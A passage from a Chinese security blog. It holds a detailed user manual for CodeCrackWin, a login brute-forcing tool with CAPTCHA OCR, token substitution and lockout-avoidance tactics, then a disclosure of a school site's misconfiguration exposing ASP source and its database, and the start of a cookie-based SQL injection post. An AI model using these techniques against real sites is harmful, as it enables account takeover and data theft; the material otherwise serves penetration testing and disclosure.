<div style="color: #990000; font-size: 14pt; font-weight: bold;">二、安裝CodeCrackWin</div>
<div style="margin-left: 2em;">CodeCrackWin 採<span style="color: #38761d; font-weight: bold;">綠色軟體</span>模式開發,不必安裝,但需依程式存放的目錄調整組態檔。</div>
<div style="margin-left: 2em;">修改CodeCrackWin.exe.config</div>
<div style="margin-left: 3em; text-indent: -1em;">1.<span style="color: blue; font-weight: bold;"><appSettings>區段的設定</span></div>
<div style="margin-left: 3em;"><span style="color: #990000; font-weight: bold;">tessedit_char_whitelist</span>:表示進行OCR時只會判斷這些字元,如果圖形碼使用的字元愈多,本程式的辨識就愈低。系統預設只用數字和大寫字母,如果待破解的網站會用到小寫字母,請將此設定的 value 加入小寫字母。如果網站的圖形碼只有數字,則將此參數值設成「0123456789」,可以提高辨識率。</div>
<div style="border: 1pt solid green; margin-left: 3em; padding: 2pt;">程式中的「 <span style="color: #990000; font-weight: bold;">OCR字元</span>」欄位內容與<span style="color: #990000; font-weight: bold;">tessedit_char_whitelist</span>的功用相同,只是「OCR字元」針對特定的網站(寫在設定檔中,程式執行時,如果「OCR字元」有值,則優先使用「OCR字元」內容,如果「<span style="color: #990000; font-weight: bold;">OCR字元</span>」是空的,則使用<span style="color: #990000; font-weight: bold;">tessedit_char_whitelist</span>的內容。</div>
<div style="margin-left: 3em;"><span style="color: #990000; font-weight: bold;">timer_tick</span>:設定嘗試破解的時間間隔,單位是毫秒,如設為3000,表示每三秒鐘才嘗試一組帳密。</div>
<div style="margin-left: 3em; text-indent: -1em;">2.
<span style="color: blue; font-weight: bold;"><userSettings>> < TesseractOCR.Properties.Settings> 區段</span></div>
<div style="margin-left: 3em;">
TessdataPath<span style="color: #990000; font-weight: bold;"><value></span>是指定ORC判斷的範本,如果設錯了,程式執行時會卡住,它的路徑一定要指定程式安裝位置下的tessdata目錄,以本例應該是D:\CodeCrack\tessdata。 (上圖是我的測試環境,和這一段的描述的路徑不同)</div>
<div style="color: #990000; font-size: 14pt; font-weight: bold;">三、第一次執行</div>
<div style="margin-left: 2em;">要執行此程式,只要雙擊「CodeCrackWin.exe」即可,起始畫面如下圖(預先填入一些值,只是為了讓使用者明白該欄位的格式),是有點複雜,而且使用上也需要一點竅門。</div>
<div style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWFGtfzbhElWOy7n20zoIbCEN7tuHnUM3g9Sq-CtFKNjRSqZYXum2o5ZW8DvqJYyUr8NpbrLhpeEvTOen_UG_CiJnKImK9fxui7H61qHAUvVkpTdjAVfUbpCLueIqxeWHceBcYM_Ew7GFR/s1253/Pic01.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="793" data-original-width="1253" height="254" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWFGtfzbhElWOy7n20zoIbCEN7tuHnUM3g9Sq-CtFKNjRSqZYXum2o5ZW8DvqJYyUr8NpbrLhpeEvTOen_UG_CiJnKImK9fxui7H61qHAUvVkpTdjAVfUbpCLueIqxeWHceBcYM_Ew7GFR/w400-h254/Pic01.png" width="400" /></a></div>
<div style="margin-left: 3em;">下列是程式各欄位說明 (畫面上的><span style="color: red; font-weight: bold;">數字</span>對應下列的<span style="color: red; font-weight: bold;">項次編號</span>):</div>
<div style="margin-left: 3em; text-indent: -1em;">1.<span style="color: #990000; font-weight: bold;">網址</span>:這是需要使用者填入帳號及密碼的頁面網址,通常就是系統的<span style="color: red; font-weight: bold;">登入頁面</span>,必須指定完整的網址,如果實際的登入頁是嵌在frame(或iframe)裡,應該要指定真正的登入頁網址,而不是佈置frame的外圍網址。</div>
<div style="margin-left: 3em; text-indent: -1em;">2.<span style="color: #990000; font-weight: bold;">帳號欄位</span>:<span style="color: red; font-weight: bold;">登入網頁</span>上用來填「帳號」的欄位之name或id屬性值。例如該欄位的HTML是<input type="text" name="<span style="color: #cc0000;">account</span>" id="account-id">,則這一欄就是填「<span style="color: #cc0000;">account</span>」;如果沒有name屬性,則填id的值「account-id」。</div>
<div style="margin-left: 3em; text-indent: -1em;">3.<span style="color: #990000; font-weight: bold;">密碼欄位</span>:<span style="color: red; font-weight: bold;">登入網頁</span>上用來填「密碼」的欄位之 name屬性內容。例如該欄位的HTML是<input type="password" name="<span style="color: #cc0000;">pwd</span>" id="pwd-id">,則這一欄就是填「<span style="color: #cc0000;">pwd</span>」;如果沒有name屬性,則填id的值「<span style="color: #cc0000;">pwd-id</span>」。</div>
<div style="margin-left: 3em; text-indent: -1em;">4.<span style="color: #990000; font-weight: bold;">圖形碼欄位</span>:<span style="color: red; font-weight: bold;">登入網頁</span>上用來填「圖形驗證碼」的欄位之name屬性內容;如果沒有name屬性,則填id的值。</div>
<div style="margin-left: 3em; text-indent: -1em;">5.<span style="color: #990000; font-weight: bold;">圖形元素的TagName</span>:由於應用程式有不同方式可提供圖形,這裡必須要知道它是用img 或 input,例如它的html碼是<<span style="color: #cc0000;">IMG </span>id=loginImg src=\"../VerifyCodeServlet?t=login\">,這一欄就填「<span style="color: #cc0000;">img</span>」。又如果是用<<span style="color: blue;">input </span>name="ImageButton1" src="ValidateCode.aspx"> ,就填「<span style="color: blue;"><span style="color: blue;">input</span>」。類型一定要正確,否則會找不到圖形。</span></div>
<div style="margin-left: 3em; text-indent: -1em;">6.<span style="color: #990000; font-weight: bold;">圖形碼來源</span>:用來判斷驗證碼圖形元素的關鍵字,程式是靠這段文字判斷哪一個元素是圖形,以<span style="color: #990000; font-weight: bold;">第5.點</span>的說明為例,圖形元素的HTML碼是<IMG id=loginImg src="../VerifyCodeServlet?t=login">,則這一欄可以填「<span style="color: red;">VerifyCodeServlet?t=login</span>」或「<span style="color: red;">VerifyCodeServlet?」</span></div>
<div style="margin-left: 3em; text-indent: -1em;">7.<span style="color: #990000; font-weight: bold;">圖形座標微調</span>:有時程式自動判斷圖片位置會有些微誤差,可以利用此欄位進行微調,單位是「像點」。有些驗證碼圖形會加外框(指圖本身),造成程式誤判背景顏色,這種情況可以利用應標微調方式避開外框,以下圖而言,紅色外框轉成灰階後會近似黑色,但實際背景應該是白色,由於框的寬度是2pix,因此可將 x,y 各設為2。<span style="background: yellow none repeat scroll 0% 0%; color: #990000; font-weight: bold;">x是水平座標</span>,也就控制圖形左邊的垂直框線,<span style="background: yellow none repeat scroll 0% 0%; color: #990000; font-weight: bold;">y是垂直座標</span>,也就控制圖形上邊的水平框線。<br />
<div style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjip69aAW1nWxAJtpl_ELcAZycAHIYQZ6FoD6maRgtnQrpypR53RNvHYSrT0mRISWyHPZXnqtIcofWxwDwjjS5QD5T65SxEHgXkjklxEWJbgZu9jcu-_LIxm7s8vjslMFCpEBUv7BHuDtCJ/s94/image003.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="36" data-original-width="94" height="36" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjip69aAW1nWxAJtpl_ELcAZycAHIYQZ6FoD6maRgtnQrpypR53RNvHYSrT0mRISWyHPZXnqtIcofWxwDwjjS5QD5T65SxEHgXkjklxEWJbgZu9jcu-_LIxm7s8vjslMFCpEBUv7BHuDtCJ/s0/image003.jpg" width="94" /></a></div>
</div>
<div style="margin-left: 3em; text-indent: -1em;">8.<span style="color: #990000; font-weight: bold;">去2nd雜點</span>及<span style="color: #990000; font-weight: bold;">去3rd雜點</span>:這是用來強化清除圖片雜點的選項,請視圖片的品質選用,有時過度清除雜點也會造成失真,要不要啟用,應該以實際情況做為依據。</div>
<div style="margin-left: 3em; text-indent: -1em;">9.<span style="color: #990000; font-weight: bold;">未使用圖形驗證碼</span>:本程式除了針對有圖形驗證的登入頁面外,也適用於無圖形驗證的登入頁面,若登入頁未使用圖形驗證碼機制,請將此欄打勾,程式就不會處理圖形辨識。要應付沒有圖形驗證碼的登入頁面,hydra會是更好的選擇。</div>
<div style="margin-left: 3em; text-indent: -1em;">10.(<span style="color: #990000; font-weight: bold;">OCR結果</span>):這裡可看到OCR辨識結果,供人工判斷辨識成功與否。</div>
<div style="margin-left: 3em; text-indent: -1em;">11.(<span style="color: #990000; font-weight: bold;">灰階值</span>):當用滑鼠點擊31.的驗證碼圖形時,這裡會顯該像點的灰階值,可做為24. 25.項的噪音線上、下限調整參考。</div>
<div style="margin-left: 3em; text-indent: -1em;">12. <span style="color: #990000; font-weight: bold;">提交字串</span>:新版改用HttpWebRequest提交資料,因此需要知道提交對象及內容。<br />
如何得知提交字串?可以利用瀏覽器的開發人員工具攔截人工登入的流量,查看「登入」時,帳號、密碼及驗證碼是如何提交給後端驗證,並記錄<span style="font-weight: bold;">提交對象</span>、<span style="font-weight: bold;">提交方法</span>及<span style="font-weight: bold;">提交內容</span>。提交字串的內容就是<span style="color: #c00000; font-weight: bold;"><提交對象>?<提交內容></span>所組成。<br />
若為GET方式,URL的內容就是<span style="font-weight: bold;">提交字串</span>,若為POST方式,要手工自行組合。<br />
為了順利提交資料,<span style="font-weight: bold;">提交字串</span>需要稍作整形,以下圖的例子來看,從瀏覽器取得的提交字串是「Account=<span style="color: red; font-weight: bold;">test</span>&Password=<span style="color: red; font-weight: bold;">password</span>&VarifyCode=<span style="color: red; font-weight: bold;">666666</span>&AccountType=Student&__RequestVerificationToken=<span style="color: red; font-weight: bold;">uar5cJQ4LbogTjPEp3dPJgcohYranexj7qfqSO4T_l-bgmJ9duY42rzCPTJxByMmY9Mu1PhWEulmZBunU7i5sRQJUa81</span>」,其中<span style="color: red; font-weight: bold;">紅字</span>部分是變動資料,必須告訴工具要用哪些資料來替換。<br />
例如:test是來自表單的「Account」欄位,所以「<span style="color: red; font-weight: bold;">test</span>」要改成「<span style="color: red; font-weight: bold;">^Account^</span>」,同理password要改成密碼欄的名稱或id,即「<span style="color: red; font-weight: bold;">password</span>」要改成「<span style="color: red; font-weight: bold;">^Password^</span>」;某些Web系統會動態塞入一些防偽造token,只要它是插在表單的欄位裡(例如 hidden),也可以利用前述的替換手法,讓系統自動提交,例如「__RequestVerificationToken=<span style="color: red; font-weight: bold;">^__RequestVerificationToken^</span>」,本工具就會從表單中找出__RequestVerificationToken的值,在請求登入時,提交正確的token值。</div>
<div style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYP_aAGCs0HsCbz35kDOUZs1rbZzNF_1iuVDiICzxpDu0wChV9RWTwdil-aLRdAj6m9a-sl08OxO8CEHCGmPfgerG-h1-qRKNIXcC9Z5DcCEeqwlVnLyk8A7oa-RJAM4q0a2yf-dfIWxAO/s1320/Pic03.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="820" data-original-width="1320" height="249" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYP_aAGCs0HsCbz35kDOUZs1rbZzNF_1iuVDiICzxpDu0wChV9RWTwdil-aLRdAj6m9a-sl08OxO8CEHCGmPfgerG-h1-qRKNIXcC9Z5DcCEeqwlVnLyk8A7oa-RJAM4q0a2yf-dfIWxAO/w400-h249/Pic03.PNG" width="400" /></a></div><br />
<div style="margin-left: 3em; text-indent: -1em;">13. <span style="color: #990000; font-weight: bold;">提交方式</span>:參考12. 的說明,依照提交方法,請選擇「GET」或「POST」。</div>
<div style="margin-left: 3em; text-indent: -1em;">14. <span style="color: #990000; font-weight: bold;">資料型態</span>:參考12. 的說明,依照提交內容的格式,請選擇「URL格式」或「JSON」。</div>
<div style="margin-left: 3em; text-indent: -1em;">15. <span style="color: #990000; font-weight: bold;">轉址層數</span>:當提交登入資料後,後端程式可能會依驗證結果而做轉址,此處的轉址層數是告訴工具,若有轉址行為,只要判斷到第幾層就好,所謂第幾層,就是收到幾次30x的狀態碼。</div>
<div style="margin-left: 3em; text-indent: -1em;">16.<span style="color: #990000; font-weight: bold;">帳號檔</span>、<span style="color: #990000; font-weight: bold;">載入帳號</span>、<span style="color: #990000; font-weight: bold;">單一帳號</span>:此三項是一體連動的,若勾選<span style="color: blue; font-weight: bold;">單一帳號</span>,則<span style="color: #0000cc; font-weight: bold;">帳號檔</span>的內容就是單筆帳號,例如只想嘗試破解admin這組帳號的密碼,就可以將<span style="color: blue; font-weight: bold;">單一帳號</span>打勾,並於<span style="color: #0000cc; font-weight: bold;">帳號檔</span>填「admin」。如果<span style="color: blue; font-weight: bold;">單一帳號</span>沒有打勾,就可以利用<span style="color: #0000cc; font-weight: bold;">載入帳號</span>鈕選擇字典檔,將待測的帳號清單載到程式中,載入後,有效的帳號筆數會出現在此按鈕文字的右方,例如載入5筆帳號,按鈕文字會由「載入帳號」變成「載入帳號(5)」,而<span style="color: #0000cc; font-weight: bold;">帳號檔</span>這一欄的內容就是帳號字典檔的路徑。</div>
<div style="margin-left: 3em; text-indent: -1em;">17.<span style="color: #990000; font-weight: bold;">密碼檔</span>、<span style="color: #990000; font-weight: bold;">載入密碼</span>、<span style="color: #990000; font-weight: bold;">單一密碼</span>:此三項是一體連動的,若勾選<span style="color: blue; font-weight: bold;">單一密碼</span>,則<span style="color: #0000cc; font-weight: bold;">密碼</span>的內容就是單筆密碼,例如只想嘗試password這組密碼,就可以將<span style="color: blue; font-weight: bold;">單一密碼</span>打勾,並於<span style="color: blue; font-weight: bold;">密碼檔</span>填「password」。如果<span style="color: blue; font-weight: bold;">單一密碼</span>沒有打勾,則可以利用<span style="color: #0000cc; font-weight: bold;">載入密碼</span>鈕選擇字典檔,將待測的密碼清單載到程式中,載入後,有效的密碼筆數會出現在此按鈕文字的右方,例如載入5筆密碼,按鈕文字會由「載入密碼」變成「載入密碼(5)」,而<span style="color: blue; font-weight: bold;">密碼檔</span>這一欄的內容就是密碼字典檔的路徑。</div>
<div style="margin-left: 3em; text-indent: -1em;">18.<span style="color: #990000; font-weight: bold;">帳密方式</span>:執行暴力破解時,<span style="color: red; font-weight: bold;">預設</span><span style="color: red;">(</span>即<span style="font-weight: bold;">都不勾選</span><span style="color: red;">時)</span>是先選一組帳號,然後測試所有密碼後(密碼先行),再選下一組帳號,這種破解方式很可能讓使用者的帳號被鎖定(DoS攻擊的一種)。本工具提供另三種帳密使用方式:<br /><span style="color: #00b050; font-weight: bold;">帳號先行</span>:有些系統會每隔一段時間(如30分鐘)自動解鎖,這時就可以選用<span style="color: #00b050; font-weight: bold;">帳號先行</span>策略,選一組密碼,嘗試所有帳號之後,再選下一組密碼,讓每組帳號被測試的間隔拉長。<br />
<span style="color: black;">帳密同行</span>:帳號清單及密碼清單同時遞增,只要其中一種測試完畢,即停止測試。<br />
<span style="color: #c00000; font-weight: bold;">只用帳號</span>:將帳號清單的內容同時填在帳號欄及密碼欄。一般用在登入頁面只有帳號欄位,而沒有密碼欄位時。(此時3. 的密碼欄位可以隨便指定一個名稱)。</div>
<div style="margin-left: 3em; text-indent: -1em;">19. <span style="color: #990000; font-weight: bold;">登入<u>失敗</u>的訊息</span>/<span style="color: #990000; font-weight: bold;">登入<u>成功</u>的訊息</span>:用來判斷帳密正確與否的字串,若<span style="color: blue; font-weight: bold;">不勾選</span>,則回應內容若存在指定的字串,就視為登入失敗;若<span style="color: blue; font-weight: bold;">勾選</span>,則回應內容若存在指定的字串,就視為登入成功。(見 20. )</div>
<div style="margin-left: 3em; text-indent: -1em;">20. (<span style="color: #990000; font-weight: bold;">判斷登入結的文字</span>):配合19. 的設定,用來判斷登入成功或失敗的回應文字。這裡判斷的字串不一定是顯示在頁面的文字,必須小心分析出成功或失敗的差異。</div>
<div style="margin-left: 3em; text-indent: -1em;">21.<span style="color: #990000; font-weight: bold;">驗證碼錯誤的訊息</span>:當驗證碼錯誤時,伺服回應的判斷訊息,程式是利用此文字判斷填入的驗證碼是否正確。</div>
<div style="margin-left: 3em; text-indent: -1em;">22.<span style="color: #990000; font-weight: bold;">帳號鎖定之訊息</span>:當帳號被鎖定時,伺服回應的判斷訊息,程式是利用此文字判斷帳號是否已被鎖住,鎖住的帳號就不會再嘗試。</div>
<div style="margin-left: 3em; text-indent: -1em;">23.<span style="color: #990000; font-weight: bold;">OCR字元</span>:設定OCR識別的範圍,如果圖形驗證碼只會出現數字,此欄可以填「0123456789」,如果會出現大小寫及數字,就必須填入「<span style="color: #c00000;">0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz</span>」</div>
<div style="margin-left: 3em; text-indent: -1em;">24.<span style="color: #990000; font-weight: bold;">噪音線灰階下限</span>、25.<span style="color: #990000; font-weight: bold;">噪音線灰階上線</span>、25'. <span style="color: #990000; font-weight: bold;">降階值</span>:這三個值會影響程式過濾圖形的噪音線及噪音點的能力,噪音線灰階的低愈低,表示顏色愈黑,0是全黑,反之,愈高就是愈白,255是全白,所謂上限或下限是指色碼值介於上、下限之間的像點才視為待辨識的文字,其餘的像點將被當成雜點而被濄濾掉,程式過濾噪音的能力就愈好,ORC的正確率就愈高。圖形會先轉成256階的灰階形式,以利OCR處理,<span style="color: #0000cc; font-weight: bold;">降階值</span>就是將256再降成更少階,例如填「8」,就是將每8階縮成1階,所以256階就會變成32階,如果圖形的文字和背景、噪音的色差很大,可以調高此值,如果色差很小,則此值就要調小一點。<span style="color: red;">這三個>值沒有一定的基準,針對不同的站臺,一定有不同的最佳值,必須自己嘗試</span>。</div>
<div style="margin-left: 3em; text-indent: -1em;">26.<span style="color: #990000; font-weight: bold;">密碼嘗試次數</span>:最少1次,若設9999即表示嘗試密碼清單中的所有值,這一項是為了防止帳號被鎖而設計的,如果已知密碼錯5次會被鎖定,則可以將次數設為3,讓帳號不會被鎖,只要過幾天,使用者正確登入,則密碼錯誤的計數就會歸零。</div>
<div style="margin-left: 3em; text-indent: -1em;">27.<span style="color: #990000; font-weight: bold;">放大倍數</span>:進行OCR時,將圖形放大有時可以提高成功率,此值為浮點數,可以設 1到2之間的數。</div>
<div style="margin-left: 3em; text-indent: -1em;">28.<span style="color: #990000; font-weight: bold;">旋轉角度</span>:有些圖形內的文字會以鈄體方式呈現,可以利用旋轉角度(-90~90之間)將它變成水平,以利OCR處理,當然對於隨機傾鈄的文字就無能為力了。</div>
<div style="margin-left: 3em; text-indent: -1em;">29.<span style="color: #990000; font-weight: bold;">test</span>鈕:當設好各個欄位後,可用「test」鈕試跑一筆,它真的只會跑一筆而已,用途就是測試欄位填的恰不恰當,也可以看看OCR結果理不理想,如果不理想可以試者調整:<span style="color: #0000cc; font-weight: bold;">噪音線灰階下限</span>、<span style="color: #0000cc; font-weight: bold;">噪音線灰階上線</span>、<span style="color: #0000cc; font-weight: bold;">降階值</span>、<span style="color: #0000cc; font-weight: bold;">去2nd雜點</span>、<span style="color: #0000cc; font-weight: bold;">去3rd雜點</span>、<span style="color: #0000cc; font-weight: bold;">放大倍數</span>、<span style="color: #0000cc; font-weight: bold;">旋轉角度</span>等參數,找出最佳辨識力。</div>
<div style="margin-left: 3em; text-indent: -1em;">30.<span style="color: #990000; font-weight: bold;">開始嘗試</span>:當按下此鈕,程式就會開始嘗試猜解,而且按鈕文字會改成「<span style="color: blue; font-weight: bold;">停止嘗試</span>」,隨時可按「停止嘗試」中止此次的猜解作業(<span style="color: #38761d;">本程式沒有「暫停」功能</span>)。</div>
<div style="margin-left: 3em; text-indent: -1em;">31.<span style="color: #990000; font-weight: bold;">查看說明</span>:載入本程式的說明文件(就是現在看到的頁面)</div>
<div style="margin-left: 3em; text-indent: -1em;">32.<span style="color: #990000; font-weight: bold;">載入設定</span>、33.<span style="color: #990000; font-weight: bold;">儲存設定</span>:因為本程式有許多設定欄位,如果每次執行都要逐一設定,鐵定瘋掉,為了讓設定結果可以重複取用,故可將目前運作良好的值存成設定檔,下次只要用「32.<span style="color: blue;">載入設定</span>」就可以取回設定值。當然也可以建一個公版,修改後用「33.<span style="color: blue;">儲存設定</span>」</div>
<div style="margin-left: 3em; text-indent: -1em;">34.(<span style="color: #990000; font-weight: bold;">瀏覽視窗</span>):每一回的瀏覽畫面會顯示在此視窗。</div>
<div style="margin-left: 3em; text-indent: -1em;">35.(<span style="color: #990000; font-weight: bold;">處理後的驗證碼圖形</span>)、36.(<span style="color: #990000; font-weight: bold;">選用圖形碼</span>):這裡會顯示圖片經程式轉換過程中,不同處理階段經OCR的結果,可以此預覽圖,做為各項參數調整的參考。在七道處理過程中,如果覺得某一道的OCR之正確率最高,可利將它<span style="color: #c00000; font-weight: bold;">勾選</span>,就會以該道的OCR結果作為提交的圖形碼,而不是提交最終結果的圖形碼。<br />此圖形處理過程平常是隱藏的,可以<span style="color: #c00000; font-weight: bold;">雙擊10. 的圖片</span>來開/關此方框。</div>
<div style="margin-left: 3em; text-indent: -1em;">37.(<span style="color: #990000; font-weight: bold;">破解的帳密</span>):如果有猜解到的帳密會顯示在這裡。而執行目錄下會記錄執行日誌,格式為yyyymmddRun.log (<span style="color: #cc0000;">yyyymmdd</span>是年月日)。<br />
在執行破解時,此清單會隱藏,若要手動開關,可以雙擊16. 或 17. 的文字標籤(即<span style="color: #c00000; font-style: italic; font-weight: bold;">帳號檔</span>或<span style="color: #c00000; font-style: italic; font-weight: bold;">密碼檔</span>字樣)</div>
<div style="margin-left: 3em; text-indent: -1em;">38.(<span style="color: #990000; font-weight: bold;">自定JavaScript</span>):這些JavaScript只會作用於登入頁面。當頁面載入完成後,會呼叫__func__函式,而寫在此處的JavaScript則會被包封進__func__中,所以,寫在此處的JavaScript只支援單純的指令,請不要再用 function NAME() { } 去包裝。例如:</div>
<div style="border: 1pt solid black; margin-left: 3em; margin-right: 2em; padding: 4pt;">/*test 不要再自己加 function NAME() { } */<br />
document.getElementById("Account").style.backgroundColor = "green";<br />
</div>
<div style="margin-left: 3em; text-indent: -1em;">39.(<span style="color: #990000; font-weight: bold;">目前嘗試的帳密</span>):為了讓使用者目前處理進度,這裡會顯示目前嘗試的帳號及密碼。</div>
<div style="color: #990000; font-size: 14pt; font-weight: bold;">四、載入帳號及密碼字典檔</div>
<div style="margin-left: 2em;">為了進行暴力猜解,會需要帳號及密碼的字典檔,字典檔必須一組資料一行,程式目前不支援在一個檔案中同時以帳號、密碼組合的配對形式,帳號及密碼必須是各自獨立的檔案。下面是帳號字典檔的範例。</div>
<div style="border: 1pt solid black; margin-left: 2em; margin-right: 2em; padding: 4pt;">
admin<br />
88991<br />
93676<br />
peterwumoj7427<br />
52137</div>
<div style="color: #990000; font-size: 14pt; font-weight: bold;">五、存成設定檔及載入設定檔</div>
<div style="margin-left: 2em;">由於猜解圖形驗證碼和猜解一般只有帳號密碼的困難度有很大差異,必須調整最佳參數才能得到理想效果,調整參數相當累人,當然不希望每回測試時都要重填一次,因此可將目前的設定結果儲存起來(見「33.<span style="color: #c00000; font-weight: bold;">儲存設定</span>」),下次執行同一網站的猜解時就可用「32.<span style="color: #c00000; font-weight: bold;">載入設定</span>」載入之前儲存的參數。<br />設定檔本身就是一支文字檔,也可以手動編輯,有關設定檔的說明請參考<a href="http://atic-tw.blogspot.tw/2017/04/codecrack_16.html" style="color: blue; text-decoration: underline;" target="_parent">CodeCrack的設定檔</a>。</div>
<div style="color: #990000; font-size: 14pt; font-weight: bold;">六、測試用範例網頁</div>
<div style="margin-left: 2em;">任隨猜解別人網站的帳密是違法行為,為了測試此工具,筆者做了一組小小的網頁(CodeCrackDemo),您可以將它架在IIS上,做為測試之用,如果執行無誤,應該會發現兩組帳密:<span style="font-weight: bold;">admin</span>/<span style="color: blue; font-weight: bold;">12345678a</span> 和<span style="font-weight: bold;">user</span>/<span style="color: blue; font-weight: bold;">myPass1234</span></div>
</div>雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com2tag:blogger.com,1999:blog-1967825056283652287.post-88573523547280235992021-08-29T05:45:00.003+08:002021-08-29T05:45:43.443+08:00網站管理員搞烏龍<div style="border: 4px solid rgb(255, 0, 0); font-size: 1.2em; line-height: 200%; padding: 8px; word-break: normal;">
<p>這是發生在國內某家高級中學全球資訊網的低級錯誤,已通報<a href="https://zeroday.hitcon.org/vulnerability/ZD-2021-00558" rel="nofollow" target="_blank">ZeroDay</a>!<br /></p>是為了節省經費或者便宜行事?該網站在同一部伺服器上掛載兩套Web服務,一套用<b>Apache+PHP</b>,另一套是<b>IIS+ASP</b>,當然,這種作法大有人在,架構本身並不是什麼問題,問題出在網站的設定上!
<p style="text-align: center;"><b>
<span style="color: #990000;">基於職業道德,不便提供此網站的網址及細部資訊</span></b>。
</p>該校首頁(PHP)利用iframe內嵌另一組新聞管理系統(ASP),由於兩個服務不能共用相同PORT,因此,首頁用<b>PORT 80</b>,新聞管理用<b>PORT 8080</b>,這樣分配很合理。不過,可能是PHP比較早建置,沒有考慮到會和ASP共用伺服器,所以將ASP網頁被當成一般文字檔。
<div>依照正常操作,瀏覽此網站並不會發現異樣,亦即,瀏覽www.XXXX.edu.tw會開啟全球資訊網首頁,首頁中間就是內嵌的新聞管理系統。<br /></div>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsdArqtb2tgIRWDFgGf3nrQrmxYFB3eDM2ujR8Poz2e2oNiUhxWi8Ykd4sfnS6WmPSKbEHSE8B-W1UkADwLHxPNfafradCkO7eQ_X9lI2-pPw4nxrYkJue4wA02fuSJFcoE8CUZz1ugHXO/s1442/homePage.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1051" data-original-width="1442" height="291" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsdArqtb2tgIRWDFgGf3nrQrmxYFB3eDM2ujR8Poz2e2oNiUhxWi8Ykd4sfnS6WmPSKbEHSE8B-W1UkADwLHxPNfafradCkO7eQ_X9lI2-pPw4nxrYkJue4wA02fuSJFcoE8CUZz1ugHXO/w400-h291/homePage.PNG" width="400" /></a></div>點擊新聞管理系統的「登入」鈕,會彈出登入畫面(見上圖),注意登入畫面上的URL,它是走PORT 8080(www.XXXX.edu.tw:8080/admin.asp),如果瀏覽此網址,但將8080移除,會神奇地看到<span style="color: #2b00fe;"><b>admin.asp的原始碼</b></span>。<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjndcXvc-HDNsWt11HEOynsUdqbYx7B8fF6nxPMbl5xZajSj8hP6Suhda-cgMAOjJxlqkb5MpdOP0DtaeHA5RcbKiu0IGcp-I9CqkbU3GBy7_RRQtIh6MABCA4QWACJudEkB_Z8ZUEiXTl5/s1070/sourceCode.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1046" data-original-width="1070" height="391" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjndcXvc-HDNsWt11HEOynsUdqbYx7B8fF6nxPMbl5xZajSj8hP6Suhda-cgMAOjJxlqkb5MpdOP0DtaeHA5RcbKiu0IGcp-I9CqkbU3GBy7_RRQtIh6MABCA4QWACJudEkB_Z8ZUEiXTl5/w400-h391/sourceCode.PNG" width="400" /></a></div>
<p>從洩漏的原始碼可看出後端使用<b>MS ACCESS</b>資料庫及其路徑,只要給予正確路徑,便能下載資料庫檔,等於把整個資料庫都拿走了!</p> <div style="margin-top: 8px;">至於怎麼修正這個錯誤呢?最簡單的作法就是不要將ASP網頁和PHP放在同一個根目錄下,只要移動ASP目錄,在IIS重新設定虛擬目錄,就能避免PHP存取ASP的資源。</div>
<div style="border: 2px solid green; margin-top: 8px;"><span style="color: red;"><b><span style="font-size: large;">有管網站的朋友,請檢查看看,是否也犯下這般烏龍失誤!</span></b></span><br /></div>
</div>雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com0tag:blogger.com,1999:blog-1967825056283652287.post-89940012024783143172021-02-21T10:44:00.002+08:002021-02-21T10:44:52.393+08:00又是Cookie惹的禍!Cookie裡的SQL Injection<div style="border: 4px solid rgb(255, 0, 0); font-size: 1.2em; line-height: 200%; padding: 8px; word-break: normal;">
<p> 前一篇<a href="http://atic-tw.blogspot.com/2021/02/blog-post.html" style="font-weight: bold;">分享破解密碼」的經驗</a>提到,開發人員將密碼編碼後記錄到<b>Cookie</b>裡,這一篇則是將資料庫的SQL語句記錄到<b>Cookie</b>裡,只要竄改<b>Cookie</b>裡的SQL語句,就能命令資料庫執行其他動作。</p>
<p><b>國內</b>某地圖查詢服務網,當使用者輸入查詢資料後,會將完整的SQL語句記錄在Cookie的<span style="color: #990000;"><b>QuerySQL</b></span>欄位中,使用者跳到下一資料頁或其他資料頁時,<span style="color: #990000;"><b>QuerySQL</b></span>內容會傳回伺服器,而且伺服器直接以此SQL語句再次執行查詢,這讓駭客有了注入SQL命令的機會。</p>
<p style="background-color: #ccccff; border: 1px solid green; line-hight: 120%; padding: 8px;">筆者曾試者利用SQLMAP去測試此進入點,但一直無法得到有效的回應,如果有同好知道如何利用SQLMAP直接攻擊SQL語句,尚請不吝指教!</p>
<p style="text-align: center;"><b>
<span style="color: #990000;">基於職業道德,不便提供此服務網站的網址及細部資訊</span></b>。
</p>
<p>首先,直接點擊查詢頁上的「<b>顯示全部</b>」鈕(<b>圖1</b>),可以得到各單位的清單,檢視清單頁的回應標頭之<b>Cookie</b>,可看到查詢的SQL語句(<b>圖2</b>)。</p>
<div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody>
<tr>
